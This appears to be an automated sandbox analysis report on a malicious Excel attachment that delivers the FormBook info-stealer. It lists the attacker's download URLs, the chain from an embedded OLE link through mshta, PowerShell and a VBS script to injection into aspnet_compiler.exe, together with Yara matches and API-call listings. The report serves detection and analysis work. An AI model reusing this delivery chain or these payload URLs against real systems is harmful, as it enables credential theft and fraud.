Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/Ts9zjeI5
Source: mshta.exe, 00000004.00000003.486308977.0000000000321000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/Ts9zjeS
Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/Ts9zjet5
Source: mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/X
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Source: unknown	HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49167 version: TLS 1.2

Creates a window with clipboard capturing capabilities

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Excel sheet contains many unusual embedded objects

Source: PI#0034250924.xla.xlsx	OLE: Microsoft Excel 2007+
Source: F7A30000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbookupdateion[1].hta

Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgID			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID			Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Memory allocated: 770B0000 page execute and read and write

Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0042BDA3 NtClose,	13_2_0042BDA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A607AC NtCreateMutant,LdrInitializeThunk,	13_2_00A607AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5F9F0 NtClose,LdrInitializeThunk,	13_2_00A5F9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FAE8 NtQueryInformationProcess,LdrInitializeThunk,	13_2_00A5FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FB68 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_00A5FB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FDC0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_00A5FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A600C4 NtCreateFile,	13_2_00A600C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A60060 NtQuerySection,	13_2_00A60060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A60078 NtResumeThread,	13_2_00A60078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A60048 NtProtectVirtualMemory,	13_2_00A60048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A601D4 NtSetValueKey,	13_2_00A601D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A6010C NtOpenDirectoryObject,	13_2_00A6010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A60C40 NtGetContextThread,	13_2_00A60C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A610D0 NtOpenProcessToken,	13_2_00A610D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A61148 NtOpenThread,	13_2_00A61148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5F8CC NtWaitForSingleObject,	13_2_00A5F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A61930 NtSetContextThread,	13_2_00A61930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5F938 NtWriteFile,	13_2_00A5F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5F900 NtReadFile,	13_2_00A5F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FAB8 NtQueryValueKey,	13_2_00A5FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FAD0 NtAllocateVirtualMemory,	13_2_00A5FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FA20 NtQueryInformationFile,	13_2_00A5FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FA50 NtEnumerateValueKey,	13_2_00A5FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FBB8 NtQueryInformationToken,	13_2_00A5FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FBE8 NtQueryVirtualMemory,	13_2_00A5FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FB50 NtCreateKey,	13_2_00A5FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FC90 NtUnmapViewOfSection,	13_2_00A5FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FC30 NtOpenProcess,	13_2_00A5FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FC60 NtMapViewOfSection,	13_2_00A5FC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FC48 NtSetInformationFile,	13_2_00A5FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A61D80 NtSuspendThread,	13_2_00A61D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FD8C NtDelayExecution,	13_2_00A5FD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FD5C NtEnumerateKey,	13_2_00A5FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FEA0 NtReadVirtualMemory,	13_2_00A5FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FED0 NtAdjustPrivilegesToken,	13_2_00A5FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FE24 NtWriteVirtualMemory,	13_2_00A5FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FFB4 NtCreateSection,	13_2_00A5FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FFFC NtCreateProcessEx,	13_2_00A5FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FF34 NtQueueApcThread,	13_2_00A5FF34

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FE89A9352E	7_2_000007FE89A9352E
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 12_2_000007FE8B6574B1	12_2_000007FE8B6574B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401000	13_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040F803	13_2_0040F803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004160B3	13_2_004160B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401260	13_2_00401260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040FA23	13_2_0040FA23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402ADD	13_2_00402ADD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402AE0	13_2_00402AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040DAA3	13_2_0040DAA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402340	13_2_00402340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0042E333	13_2_0042E333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402334	13_2_00402334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402E70	13_2_00402E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040F7FA	13_2_0040F7FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A6E0C6	13_2_00A6E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A6E2E9	13_2_00A6E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B163BF	13_2_00B163BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A963DB	13_2_00A963DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A72305	13_2_00A72305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00ABA37B	13_2_00ABA37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AF443E	13_2_00AF443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AF05E3	13_2_00AF05E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A8C5F0	13_2_00A8C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AB6540	13_2_00AB6540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A74680	13_2_00A74680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A7E6C1	13_2_00A7E6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B12622	13_2_00B12622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00ABA634	13_2_00ABA634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A7C7BC	13_2_00A7C7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A9286D	13_2_00A9286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A7C85C	13_2_00A7C85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A729B2	13_2_00A729B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B1098E	13_2_00B1098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B049F5	13_2_00B049F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A869FE	13_2_00A869FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00ABC920	13_2_00ABC920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B1CBA4	13_2_00B1CBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AF6BCB	13_2_00AF6BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B12C9C	13_2_00B12C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AFAC5E	13_2_00AFAC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AA0D3B	13_2_00AA0D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A7CD5B	13_2_00A7CD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AA2E2F	13_2_00AA2E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A8EE4C	13_2_00A8EE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B0CFB1	13_2_00B0CFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AE2FDC	13_2_00AE2FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A80F3F	13_2_00A80F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A9D005	13_2_00A9D005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AED06D	13_2_00AED06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A73040	13_2_00A73040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A8905A	13_2_00A8905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AFD13F	13_2_00AFD13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B11238	13_2_00B11238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A6F3CF	13_2_00A6F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A77353	13_2_00A77353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A81489	13_2_00A81489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AA5485	13_2_00AA5485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AAD47D	13_2_00AAD47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B135DA	13_2_00B135DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A7351F	13_2_00A7351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AF579A	13_2_00AF579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AA57C3	13_2_00AA57C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B0771D	13_2_00B0771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B0F8EE	13_2_00B0F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AEF8C4	13_2_00AEF8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AF394B	13_2_00AF394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AF5955	13_2_00AF5955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B23A83	13_2_00B23A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A6FBD7	13_2_00A6FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AFDBDA	13_2_00AFDBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A97B00	13_2_00A97B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B0FDDD	13_2_00B0FDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AFBF14	13_2_00AFBF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A9DF7C	13_2_00A9DF7C

Document contains embedded VBA macros

Source: PI#0034250924.xla.xlsx

OLE indicator, VBA macros: true

Document embeds suspicious OLE2 link

Source: PI#0034250924.xla.xlsx	Stream path 'MBd0019C635/\x1Ole' : https://og1.in/Ts9zje%kH2PtB@h']}kcoW8urgju7qSIyaY6rMfoRvqJjFI1MRxDhJ0cgZCOILDjTfxNUj50KG2ed9pKmaMFcHRLPB6jFvTt3m12GrIMTshxM4f1f2xwH0Kkfjk36FCfVkQuag2tuZ2peUDjVhwE8iqQxTFkHUBeJah92hLjWBFYZUL5ldm7b9N)BhA0<mXm'_
Source: F7A30000.0.dr	Stream path 'MBD0019C635/\x1Ole' : https://og1.in/Ts9zje%kH2PtB@h']}kcoW8urgju7qSIyaY6rMfoRvqJjFI1MRxDhJ0cgZCOILDjTfxNUj50KG2ed9pKmaMFcHRLPB6jFvTt3m12GrIMTshxM4f1f2xwH0Kkfjk36FCfVkQuag2tuZ2peUDjVhwE8iqQxTFkHUBeJah92hLjWBFYZUL5ldm7b9N)BhA0<mXm'_

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00A6DF5C appears 137 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00ADF970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00AB3F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00AB373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00A6E2A8 appears 60 times

PE file does not import any functions

Source: temp_exec.exe.11.dr

Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Yara signature match

Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: temp_exec.exe.11.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 12.2.temp_exec.exe.2bc9ae0.2.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 12.2.temp_exec.exe.8e0000.0.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@16/21@2/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$PI#0034250924.xla.xlsx

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8E88.tmp

Jump to behavior

Source: PI#0034250924.xla.xlsx	OLE indicator, Workbook stream: true
Source: F7A30000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w..............D.......D......1D.....(.P.......D......3D......................j~.............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................K..l....}..w.....j~.....\.F.......D.............(.P..... .......(.......8...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................K..l....}..w.....j~.....\.F.......D.............(.P..... .......(.......8...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.@0p........l....@.o.....(.P..... .......(............... .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P..... .......(...............8.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...(...............F.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(...............l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................j~.............0.~':....Wl.....}..w....8.......@EE.....^...............(.P..... .......(.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................j~.................:....Wl.....}..w....8.......@EE.....^...............(.P..... .......(.......................................	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
